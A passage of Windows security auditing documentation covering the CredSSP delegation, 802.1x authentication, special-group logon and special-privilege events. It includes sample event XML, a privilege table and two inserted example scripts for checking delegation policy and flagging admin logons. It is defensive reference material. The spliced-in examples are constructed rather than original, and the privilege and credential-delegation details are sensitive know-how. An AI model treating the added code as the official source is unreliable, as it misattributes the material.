    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>5378</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>12551</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8010000000000000</Keywords>
    <TimeCreated SystemTime="2015-11-11T03:23:48.502346900Z" />
    <EventRecordID>1198733</EventRecordID>
    <Correlation />
    <Execution ProcessID="500" ThreadID="4308" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
    <Data Name="SubjectUserName">dadmin</Data>
    <Data Name="SubjectDomainName">CONTOSO</Data>
    <Data Name="SubjectLogonId">0x2b1e04</Data>
    <Data Name="Package">CREDSSP</Data>
    <Data Name="UserUPN">dadmin@contoso</Data>
    <Data Name="TargetServer">WSMAN/dc01.contoso.local</Data>
    <Data Name="CredType">%%8098</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of the account that requested credentials delegation. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested credentials delegation.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Credential Delegation Information:
Security Package [Type = UnicodeString]: the name of the security package that was used. Always CREDSSP for this event.
User's UPN [Type = UnicodeString]: UPN of the account for which delegation was requested.
Target Server [Type = UnicodeString]: SPN of the target service for which delegation was requested.

Note Service Principal Name (SPN) is the name by which a client uniquely identifies an instance of a service. If you install multiple instances of a service on computers throughout a forest, each instance must have its own SPN. A given service instance can have multiple SPNs if there are multiple names that clients might use for authentication. For example, an SPN always includes the name of the host computer on which the service instance is running, so a service instance might register an SPN for each name or alias of its host.

Credential Type [Type = UnicodeString]: the type of credentials that were presented for delegation:

CREDENTIALS TYPE / DESCRIPTION
Default credentials – The credentials obtained when the user first logs on to Windows.
Fresh credentials – The credentials that the user is prompted for when executing an application.
Saved credentials – The credentials that are saved using Credential Manager.

Security Monitoring Recommendations

For 5378(F): The requested credentials delegation was disallowed by policy.

Important For this event, also see Appendix A: Security monitoring recommendations for many audit events.

If you have defined a CredSSP delegation policy, this event shows you violations of that policy. We recommend collecting these events and investigating every violation.
This event can also be used for CredSSP delegation troubleshooting.
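Because 5378 is logged on the machine that requested the delegation, the usual follow-up is to compare the Target Server SPN in the event with what that machine's CredSSP client policy allows. The following PowerShell is an added example written for this page, not code from the original document or from Microsoft: it reads the policy lists that Enable-WSManCredSSP (or the Credentials Delegation Group Policy) writes, tests whether a given SPN would be allowed, and shows the narrowly scoped enable/disable commands for the WinRM double-hop case. The SPN and host names are taken from the event above; the helper names, the two policy lists and the wildcard comparison used to approximate the policy match are assumptions.

```powershell
# Added example (not from the original page): inspect the client-side CredSSP delegation
# policy that decides whether 5378 is logged. The helper names are ours; the registry path and
# cmdlets are the ones Enable-WSManCredSSP and the "Credentials Delegation" Group Policy use.
$PolicyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\CredentialsDelegation'

function Get-CredSspAllowedTargets {
    # Returns the server patterns (for example WSMAN/*.contoso.local) allowed for fresh-credential
    # delegation. The WhenNTLMOnly list is included because WinRM uses it when Kerberos is not available.
    param([string]$Root = $PolicyKey)
    $targets = @()
    foreach ($name in 'AllowFreshCredentials', 'AllowFreshCredentialsWhenNTLMOnly') {
        $enabled = (Get-ItemProperty -Path $Root -Name $name -ErrorAction SilentlyContinue).$name
        if ($enabled -ne 1) { continue }                       # this list is not enabled; skip it
        $list = Get-ItemProperty -Path (Join-Path $Root $name) -ErrorAction SilentlyContinue
        if ($null -eq $list) { continue }
        # The server list is stored as values named "1", "2", ...; ignore the PS* properties.
        $targets += $list.PSObject.Properties | Where-Object { $_.Name -match '^\d+$' } | ForEach-Object { $_.Value }
    }
    return $targets
}

function Test-CredSspTargetAllowed {
    # Assumption: a case-insensitive wildcard match approximates how the policy list is evaluated.
    param([string]$TargetServer, [string[]]$Allowed)
    foreach ($pattern in $Allowed) { if ($TargetServer -like $pattern) { return $true } }
    return $false
}

# Constructed input: the Target Server SPN from the 5378 record above, checked against a tightly
# scoped list and an over-broad one. On a live machine use (Get-CredSspAllowedTargets) instead.
$eventTarget = 'WSMAN/dc01.contoso.local'
$scoped      = @('WSMAN/jumphost.contoso.local')   # dc01 not covered: delegation refused, 5378 logged
$overBroad   = @('WSMAN/*')                        # covers any host, including one an attacker controls

"scoped list allows $eventTarget : $(Test-CredSspTargetAllowed $eventTarget $scoped)"
"over-broad list allows $eventTarget : $(Test-CredSspTargetAllowed $eventTarget $overBroad)"

# Fixing the WinRM double hop without widening exposure: name the exact target, never "*".
# On the machine that requests delegation (where 5378 is logged):
#   Enable-WSManCredSSP -Role Client -DelegateComputer 'dc01.contoso.local' -Force
# On the server that must forward the credentials onward:
#   Enable-WSManCredSSP -Role Server -Force
# Review and roll back:
#   Get-WSManCredSSP
#   Disable-WSManCredSSP -Role Client
```

The security point behind the policy check: CredSSP hands the user's plaintext credentials to the target server, so an entry such as WSMAN/* means any host that can get the client to connect receives them. Investigate each 5378 as the page recommends, but treat a "fix" that widens the list to a wildcard as a finding in its own right.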
5632(S, F): A request was made to authenticate to a wireless network.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Logon/Logoff Events
Event Description:
This event generates when an 802.1x authentication attempt was made for a wireless network.
It typically generates when a network adapter connects to a new wireless network.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>5632</EventID>
    <Version>1</Version>
    <Level>0</Level>
    <Task>12551</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-11-10T23:10:34.052054800Z" />
    <EventRecordID>44113845</EventRecordID>
    <Correlation />
    <Execution ProcessID="712" ThreadID="4176" />
    <Channel>Security</Channel>
    <Computer>XXXXXXX.redmond.corp.microsoft.com</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="SSID">Nokia</Data>
    <Data Name="Identity">host/XXXXXXXX.redmond.corp.microsoft.com</Data>
    <Data Name="SubjectUserName">-</Data>
    <Data Name="SubjectDomainName">-</Data>
    <Data Name="SubjectLogonId">0x0</Data>
    <Data Name="PeerMac">18:64:72:F3:33:91</Data>
    <Data Name="LocalMac">02:1A:C5:14:59:C9</Data>
    <Data Name="IntfGuid">{2BB33827-6BB6-48DB-8DE6-DB9E0B9F9C9B}</Data>
    <Data Name="ReasonCode">0x0</Data>
    <Data Name="ReasonText">The operation was successful.</Data>
    <Data Name="ErrorCode">0x0</Data>
    <Data Name="EAPReasonCode">0x0</Data>
    <Data Name="EapRootCauseString" />
    <Data Name="EAPErrorCode">0x0</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = UnicodeString]: User Principal Name (UPN) or another type of account identifier for which the 802.1x authentication request was made.

Note User principal name (UPN) format is used to specify an Internet-style name, such as UserName@Example.Microsoft.com.

Account Name [Type = UnicodeString]: the name of the account for which 802.1x authentication request
was made.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Network Information:
Name (SSID) [Type = UnicodeString]: SSID of the wireless network to which the authentication request was sent.

Note A service set identifier (SSID) is a sequence of characters that uniquely names a wireless local area network (WLAN). An SSID is sometimes referred to as a "network name." This name allows stations to connect to the desired network when multiple independent networks operate in the same physical area.

Interface GUID [Type = GUID]: GUID of the network interface that was used for the authentication request.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify resources, activities or instances.

You can see the interface’s GUID using the following commands:
“netsh lan show interfaces” – for wired interfaces.
“netsh wlan show interfaces” – for wireless interfaces.

Local MAC Address [Type = UnicodeString]: the local interface’s MAC address.
Peer MAC Address [Type = UnicodeString]: the peer’s (typically the access point’s) MAC address.
Additional Information:
Reason Code [Type = UnicodeString]: contains Reason Text (explanation of Reason Code) and Reason
Code for wireless authentication results. See more information about reason codes for wireless
authentication here: https://msdn.microsoft.com/library/windows/desktop/dd877212(v=vs.85).aspx,
https://technet.microsoft.com/library/cc727747(v=ws.10).aspx.
Error Code [Type = HexInt32]: there is no information about this field in this document.
EAP Reason Code [Type = HexInt32]: there is no information about this field in this document. See
additional information here: https://technet.microsoft.com/library/dd197570(v=ws.10).aspx.
EAP Root Cause String [Type = UnicodeString]: there is no information about this field in this document.
EAP Error Code [Type = HexInt32]: there is no information about this field in this document.

Security Monitoring Recommendations

For 5632(S, F): A request was made to authenticate to a wireless network.
There is no recommendation for this event in this document.
5633(S, F): A request was made to authenticate to a wired network.
4/5/2019

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Other Logon/Logoff Events
Event Description:
This event generates when an 802.1x authentication attempt was made for a wired network.
It typically generates when a network adapter connects to a new wired network.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
    <EventID>5633</EventID>
    <Version>0</Version>
    <Level>0</Level>
    <Task>12551</Task>
    <Opcode>0</Opcode>
    <Keywords>0x8020000000000000</Keywords>
    <TimeCreated SystemTime="2015-11-11T01:26:59.679232500Z" />
    <EventRecordID>1198715</EventRecordID>
    <Correlation />
    <Execution ProcessID="500" ThreadID="2920" />
    <Channel>Security</Channel>
    <Computer>DC01.contoso.local</Computer>
    <Security />
  </System>
  <EventData>
    <Data Name="InterfaceName">Microsoft Hyper-V Network Adapter</Data>
    <Data Name="Identity">-</Data>
    <Data Name="SubjectUserName">-</Data>
    <Data Name="SubjectDomainName">-</Data>
    <Data Name="SubjectLogonId">0x0</Data>
    <Data Name="ReasonCode">0x70003</Data>
    <Data Name="ReasonText">The network does not support authentication</Data>
    <Data Name="ErrorCode">0x0</Data>
  </EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = UnicodeString]: User Principal Name (UPN) of account for which 802.1x authentication request was made.

Note User principal name (UPN) format is used to specify an Internet-style name, such as UserName@Example.Microsoft.com.

Account Name [Type = UnicodeString]: the name of the account for which 802.1x authentication request
was made.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Interface:
Name [Type = UnicodeString]: the name (description) of the network interface that was used for the authentication request. You can get the list of all available network adapters with the “ipconfig /all” command; see the “Description” row for every network adapter.

Additional Information:
Reason Code [Type = UnicodeString]: contains Reason Text (explanation of Reason Code) and Reason Code
for wired authentication results. See more information about reason codes for wired authentication here:
https://msdn.microsoft.com/library/windows/desktop/dd877212(v=vs.85).aspx,
https://technet.microsoft.com/library/cc727747(v=ws.10).aspx.
Error Code [Type = HexInt32]: unique EAP error code.

Security Monitoring Recommendations


For 5633(S, F): A request was made to authenticate to a wired network.
There is no recommendation for this event in this document.
Audit Special Logon

Applies to
Windows 10
Windows Server 2016
Audit Special Logon determines whether the operating system generates audit events under special sign on (or log on) circumstances.
This subcategory allows you to audit events generated by special logons such as the following:
The use of a special logon, which is a logon that has administrator-equivalent privileges and can be used to elevate a process to a higher level.
A logon by a member of a Special Group. Special Groups enable you to audit events generated when a member of a certain group has logged on to your network. You can configure a list of group security identifiers (SIDs) in the registry. If any of those SIDs are added to a token during logon and the subcategory is enabled, an event is logged.
Event volume:
Low on a client computer.
Medium on domain controllers or network servers.

COMPUTER TYPE | GENERAL SUCCESS | GENERAL FAILURE | STRONGER SUCCESS | STRONGER FAILURE | COMMENTS
Domain Controller | Yes | No | Yes | No | This subcategory is very important because of Special Groups related events; you must enable this subcategory for Success audit if you use this feature. At the same time this subcategory allows you to track account logon sessions to which sensitive privileges were assigned. This subcategory doesn’t have Failure events, so there is no recommendation to enable Failure auditing for this subcategory.
Member Server | Yes | No | Yes | No | Same as for Domain Controller.
Workstation | Yes | No | Yes | No | Same as for Domain Controller.

Events List:
4964(S): Special groups have been assigned to a new logon.
4672(S): Special privileges assigned to new logon.
4964(S): Special groups have been assigned to a new logon.

Applies to
Windows 10
Windows Server 2016
Subcategory: Audit Special Logon
Event Description:
This event occurs when an account that is a member of any defined Special Group logs in.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4964</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12548</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-11T02:25:16.236443300Z" />
<EventRecordID>238923</EventRecordID>
<Correlation />
<Execution ProcessID="504" ThreadID="5008" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0xd972e</Data>
<Data Name="LogonGuid">{00000000-0000-0000-0000-000000000000}</Data>
<Data Name="TargetUserSid">S-1-5-21-3457937927-2839227994-823803824-500</Data>
<Data Name="TargetUserName">ladmin</Data>
<Data Name="TargetDomainName">CONTOSO</Data>
<Data Name="TargetLogonId">0x139faf</Data>
<Data Name="TargetLogonGuid">{B03B6192-09AE-E77F-DD10-2DC430766040}</Data>
<Data Name="SidList">%{S-1-5-21-3457937927-2839227994-823803824-512}</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.

Note Special Groups is a new feature in Windows Vista and in Windows Server 2008. The Special Groups
feature lets the administrator find out when a member of a certain group logs on to the computer. The Special
Groups feature lets an administrator set a list of group security identifiers (SIDs) in the registry.

To add Special Groups perform the following actions:
1. Open Registry Editor.
2. Locate and then click the following registry subkey:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\Audit
3. On the Edit menu, point to New, and then click String Value.
4. Type SpecialGroups, and then press ENTER.
5. Right-click SpecialGroups, and then click Modify.
6. In the Value data box, type the group SIDs, and then click OK.
A semicolon character (;) can be used to delimit the SID list. For example, you can use the following string that contains a semicolon to delimit two SIDs:
S-1-5-32-544;S-1-5-32-123-54-65
For more information see: http://blogs.technet.com/b/askds/archive/2008/03/11/special-groups-auditing-via-group-policy-preferences.aspx
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account that requested logon for New Logon account. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account that requested logon for New Logon
account.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Logon GUID [Type = GUID]: a GUID that can help you correlate this event with another event that can contain the same Logon GUID, “4769(S, F): A Kerberos service ticket was requested” event on a domain controller.
It also can be used for correlation between a 4964 event and several other events (on the same computer) that can contain the same Logon GUID, “4648(S): A logon was attempted using explicit credentials” and “4624(S): An account was successfully logged on.”
This parameter might not be captured in the event, and in that case appears as “{00000000-0000-0000-0000-000000000000}”.

Note GUID is an acronym for 'Globally Unique Identifier'. It is a 128-bit integer number used to identify
resources, activities or instances.

New Logon:
Security ID [Type = SID]: SID of account that performed the logon. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.
Account Name [Type = UnicodeString]: the name of the account that performed the logon.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Logon GUID [Type = GUID]: a GUID that can help you correlate this event with another event that can contain the same Logon GUID, “4769(S, F): A Kerberos service ticket was requested” event on a domain controller.
It also can be used for correlation between a 4964 event and several other events (on the same computer) that can contain the same Logon GUID, “4648(S): A logon was attempted using explicit credentials” and “4624(S): An account was successfully logged on.”
This parameter might not be captured in the event, and in that case appears as “{00000000-0000-0000-0000-000000000000}”.
Special Groups Assigned [Type = UnicodeString]: the list of special group SIDs of which New Logon\Security ID is a member.

Security Monitoring Recommendations


For 4964(S): Special groups have been assigned to a new logon.
Generally speaking, every 4964 event should be monitored, because the purpose of Special Groups is to
define a list of critical or important groups (Domain Admins, Enterprise Admins, service account groups, and
so on) and trigger an event every time a member of these groups logs on to a computer. For example, you can
monitor for every Domain Administrators logon to a non-administrative workstation.
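The following is an added example, not code from the Microsoft page: it builds and validates the semicolon-delimited SpecialGroups string from the registry procedure above, parses the %{SID} list that a 4964 event carries in its Special Groups Assigned field, and applies the monitoring recommendation just stated (a Domain Admins logon to a non-administrative workstation). The SID list, the host allowlist (ADMIN_HOSTS) and the sample event's Computer value are constructed assumptions; the Domain Admins SID is the RID-512 value from the page's sample event.

```python
# Added example (not from the Microsoft page): build and validate the SpecialGroups
# registry string described above, then check a 4964 event against that list.
import re
import xml.etree.ElementTree as ET

EVENT_NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# SID syntax: S-1-<identifier authority>-<one or more sub-authorities>
SID_RE = re.compile(r"^S-1-\d+(?:-\d+){1,15}$")

# Constructed configuration (assumption): BUILTIN\Administrators plus the CONTOSO
# Domain Admins SID (RID 512) that appears in the page's sample event.
SPECIAL_GROUPS = [
    "S-1-5-32-544",
    "S-1-5-21-3457937927-2839227994-823803824-512",
]

# Constructed allowlist (assumption) of hosts where a special-group logon is expected.
ADMIN_HOSTS = {"DC01.contoso.local", "PAW01.contoso.local"}


def build_special_groups_value(sids):
    """Return the ';'-delimited string for the SpecialGroups value under
    HKLM\\System\\CurrentControlSet\\Control\\Lsa\\Audit. A malformed SID is
    rejected up front: a typo here silently drops the group from auditing."""
    bad = [s for s in sids if not SID_RE.match(s)]
    if bad:
        raise ValueError(f"malformed SID(s): {bad}")
    return ";".join(sids)


def parse_special_groups_value(value):
    """Split the registry string back into a list of SIDs (empty entries ignored)."""
    return [s for s in value.split(";") if s]


# Constructed 4964 event, modelled on the page's sample but with the Computer
# changed to a workstation so the "non-administrative host" case is exercised.
SAMPLE_4964 = """<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4964</EventID><Computer>WS42.contoso.local</Computer></System>
  <EventData>
    <Data Name="TargetUserSid">S-1-5-21-3457937927-2839227994-823803824-500</Data>
    <Data Name="TargetUserName">ladmin</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="TargetLogonId">0x139faf</Data>
    <Data Name="SidList">%{S-1-5-21-3457937927-2839227994-823803824-512}</Data>
  </EventData>
</Event>"""


def parse_4964(xml_text):
    """Extract the fields needed for monitoring. SidList is rendered as
    %{SID} items, so the SIDs are pulled out of the braces."""
    root = ET.fromstring(xml_text)
    data = {d.get("Name"): (d.text or "") for d in root.find("e:EventData", EVENT_NS)}
    return {
        "event_id": int(root.findtext("e:System/e:EventID", namespaces=EVENT_NS)),
        "computer": root.findtext("e:System/e:Computer", namespaces=EVENT_NS),
        "user": f'{data["TargetDomainName"]}\\{data["TargetUserName"]}',
        "logon_id": data["TargetLogonId"],
        "sids": re.findall(r"\{([^}]+)\}", data["SidList"]),
    }


def evaluate_4964(event, special_groups=SPECIAL_GROUPS, admin_hosts=ADMIN_HOSTS):
    """Every 4964 is worth recording; raise the severity when a special-group
    member logs on to a host outside the administrative allowlist."""
    matched = [s for s in event["sids"] if s in special_groups]
    off_host = event["computer"] not in admin_hosts
    return {
        "matched_groups": matched,
        "severity": "high" if (matched and off_host) else "info",
    }


if __name__ == "__main__":
    print(build_special_groups_value(SPECIAL_GROUPS))
    print(evaluate_4964(parse_4964(SAMPLE_4964)))
```

The validation step matters because the registry value is a free-form string: a SID that is mistyped is not reported anywhere, it simply never matches a token, so the logon of that group goes unaudited.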
4672(S): Special privileges assigned to new logon.

Applies to
Windows 10
Windows Server 2016

Subcategory: Audit Special Logon
Event Description:
This event generates for new account logons if any of the following sensitive privileges are assigned to the new logon session:
SeTcbPrivilege - Act as part of the operating system
SeBackupPrivilege - Back up files and directories
SeCreateTokenPrivilege - Create a token object
SeDebugPrivilege - Debug programs
SeEnableDelegationPrivilege - Enable computer and user accounts to be trusted for delegation
SeAuditPrivilege - Generate security audits
SeImpersonatePrivilege - Impersonate a client after authentication
SeLoadDriverPrivilege - Load and unload device drivers
SeSecurityPrivilege - Manage auditing and security log
SeSystemEnvironmentPrivilege - Modify firmware environment values
SeAssignPrimaryTokenPrivilege - Replace a process-level token
SeRestorePrivilege - Restore files and directories
SeTakeOwnershipPrivilege - Take ownership of files or other objects
You will typically see many of these events in the event log, because every logon of the SYSTEM (Local System) account triggers this event.

Note For recommendations, see Security Monitoring Recommendations for this event.

Event XML:
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" />
<EventID>4672</EventID>
<Version>0</Version>
<Level>0</Level>
<Task>12548</Task>
<Opcode>0</Opcode>
<Keywords>0x8020000000000000</Keywords>
<TimeCreated SystemTime="2015-09-11T01:10:57.091809600Z" />
<EventRecordID>237692</EventRecordID>
<Correlation />
<Execution ProcessID="504" ThreadID="524" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <EventData>
<Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data>
<Data Name="SubjectUserName">dadmin</Data>
<Data Name="SubjectDomainName">CONTOSO</Data>
<Data Name="SubjectLogonId">0x671101</Data>
<Data Name="PrivilegeList">SeTcbPrivilege SeSecurityPrivilege SeTakeOwnershipPrivilege SeLoadDriverPrivilege
SeBackupPrivilege SeRestorePrivilege SeDebugPrivilege SeSystemEnvironmentPrivilege SeEnableDelegationPrivilege
SeImpersonatePrivilege</Data>
</EventData>
</Event>

Required Server Roles: None.


Minimum OS Version: Windows Server 2008, Windows Vista.
Event Versions: 0.
Field Descriptions:
Subject:
Security ID [Type = SID]: SID of account to which special privileges were assigned. Event Viewer automatically tries to resolve SIDs and show the account name. If the SID cannot be resolved, you will see the source data in the event.

Note A security identifier (SID) is a unique value of variable length used to identify a trustee (security principal). Each account has a unique SID that is issued by an authority, such as an Active Directory domain controller, and stored in a security database. Each time a user logs on, the system retrieves the SID for that user from the database and places it in the access token for that user. The system uses the SID in the access token to identify the user in all subsequent interactions with Windows security. When a SID has been used as the unique identifier for a user or group, it cannot ever be used again to identify another user or group. For more information about SIDs, see Security identifiers.

Account Name [Type = UnicodeString]: the name of the account to which special privileges were
assigned.
Account Domain [Type = UnicodeString]: subject’s domain or computer name. Formats vary, and include
the following:
Domain NETBIOS name example: CONTOSO
Lowercase full domain name: contoso.local
Uppercase full domain name: CONTOSO.LOCAL
For some well-known security principals, such as LOCAL SERVICE or ANONYMOUS LOGON, the
value of this field is “NT AUTHORITY”.
For local user accounts, this field will contain the name of the computer or device that this account
belongs to, for example: “Win81”.
Logon ID [Type = HexInt64]: hexadecimal value that can help you correlate this event with recent events
that might contain the same Logon ID, for example, “4624: An account was successfully logged on.”
Privileges [Type = UnicodeString]: the list of sensitive privileges, assigned to the new logon. The following table contains the list of possible privileges for this event:

PRIVILEGE NAME | USER RIGHT GROUP POLICY NAME | DESCRIPTION
SeAssignPrimaryTokenPrivilege | Replace a process-level token | Required to assign the primary token of a process. With this privilege, the user can initiate a process to replace the default token associated with a started subprocess.
SeAuditPrivilege | Generate security audits | With this privilege, the user can add entries to the security log.
SeBackupPrivilege | Back up files and directories | Required to perform backup operations. With this privilege, the user can bypass file and directory, registry, and other persistent object permissions for the purposes of backing up the system. This privilege causes the system to grant all read access control to any file, regardless of the access control list (ACL) specified for the file. Any access request other than read is still evaluated with the ACL. The following access rights are granted if this privilege is held: READ_CONTROL, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_READ, FILE_TRAVERSE.
SeCreateTokenPrivilege | Create a token object | Allows a process to create a token which it can then use to get access to any local resources when the process uses NtCreateToken() or other token-creation APIs. When a process requires this privilege, we recommend using the LocalSystem account (which already includes the privilege), rather than creating a separate user account and assigning this privilege to it.
SeDebugPrivilege | Debug programs | Required to debug and adjust the memory of a process owned by another account. With this privilege, the user can attach a debugger to any process or to the kernel. We recommend that SeDebugPrivilege always be granted to Administrators, and only to Administrators. Developers who are debugging their own applications do not need this user right. Developers who are debugging new system components need this user right. This user right provides complete access to sensitive and critical operating system components.
SeEnableDelegationPrivilege | Enable computer and user accounts to be trusted for delegation | Required to mark user and computer accounts as trusted for delegation. With this privilege, the user can set the Trusted for Delegation setting on a user or computer object. The user or object that is granted this privilege must have write access to the account control flags on the user or computer object. A server process running on a computer (or under a user context) that is trusted for delegation can access resources on another computer using the delegated credentials of a client, as long as the account of the client does not have the Account cannot be delegated account control flag set.
SeImpersonatePrivilege | Impersonate a client after authentication | With this privilege, the user can impersonate other accounts.
SeLoadDriverPrivilege | Load and unload device drivers | Required to load or unload a device driver. With this privilege, the user can dynamically load and unload device drivers or other code into kernel mode. This user right does not apply to Plug and Play device drivers.
SeRestorePrivilege | Restore files and directories | Required to perform restore operations. This privilege causes the system to grant all write access control to any file, regardless of the ACL specified for the file. Any access request other than write is still evaluated with the ACL. Additionally, this privilege enables you to set any valid user or group SID as the owner of a file. The following access rights are granted if this privilege is held: WRITE_DAC, WRITE_OWNER, ACCESS_SYSTEM_SECURITY, FILE_GENERIC_WRITE, FILE_ADD_FILE, FILE_ADD_SUBDIRECTORY, DELETE. With this privilege, the user can bypass file, directory, registry, and other persistent object permissions when restoring backed up files and directories, and it determines which users can set any valid security principal as the owner of an object.
SeSecurityPrivilege | Manage auditing and security log | Required to perform a number of security-related functions, such as controlling and viewing audit events in the security event log. With this privilege, the user can specify object access auditing options for individual resources, such as files, Active Directory objects, and registry keys. A user with this privilege can also view and clear the security log.
SeSystemEnvironmentPrivilege | Modify firmware environment values | Required to modify the nonvolatile RAM of systems that use this type of memory to store configuration information.
SeTakeOwnershipPrivilege | Take ownership of files or other objects | Required to take ownership of an object without being granted discretionary access. This privilege allows the owner value to be set only to those values that the holder may legitimately assign as the owner of an object. With this privilege, the user can take ownership of any securable object in the system, including Active Directory objects, files and folders, printers, registry keys, processes, and threads.
